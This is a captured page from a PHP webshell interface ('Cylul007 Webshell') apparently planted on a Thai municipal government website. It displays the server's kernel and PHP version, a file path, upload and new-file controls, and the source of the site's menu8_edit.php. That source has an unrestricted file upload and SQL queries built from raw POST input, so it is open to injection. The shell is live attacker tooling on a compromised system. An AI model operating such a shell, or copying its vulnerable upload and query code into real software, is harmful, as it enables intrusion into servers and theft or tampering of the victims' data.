Cylul007 Webshell
Uname
:
Linux ns7.thaihispeed.com 3.10.0-693.11.1.el7.x86_64 #1 SMP Mon Dec 4 23:52:40 UTC 2017 x86_64
PHP
:
5.3.29
on
apache2handler
Time
:
24 Nov 2024 20:40:50
Path :
/
home
/
tassabanlo
/
domains
/
lomsak.go.th
/
public_html
/
File Upload :
New File
New Folder
Current File : /home/tassabanlo/domains/lomsak.go.th/public_html/menu8_edit.php
Download
HOME
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut icon" type="image/x-icon" href="images/favicon.ico" /> <title>สำนักงานเทศบาลเมืองหล่มสัก</title> </head> <? include "connect.php"; $menu_id8 = $_POST['menu_id8']; $fileupload=$_FILES['photo']['tmp_name']; $fileupload_name=$_FILES['photo']['name']; if($fileupload != ""){ if($img8 != ""){ unlink("./menu8/$img8"); } copy($fileupload,"./menu8/".$fileupload_name); $sql = "UPDATE menu8 SET menu_id8 = '$menu_id8',img8 = '$fileupload_name' WHERE menu_id8 = '$menu_id8' "; } else{ $sql="UPDATE menu8 SET menu_id8 = '$menu_id8' WHERE menu_id8 = '$menu_id8' "; } mysql_query($sql,$conn) or die("3.ไม่สามารถประมวลผลคำสั่งได้"); mysql_close(); echo"<script language=\"javascript\">"; echo"alert('บันทึกข้อมูลเรียบร้อยแล้ว');"; echo"window.location = 'menu8admin.php';"; echo"</script>"; ?> <body> <input name="menu_id8" type="hidden" id="menu_id8" value="<? echo $rs['menu_id8'] ; ?>" /> </body> </html>
Copyright © 2018 - Powered By CytoXploit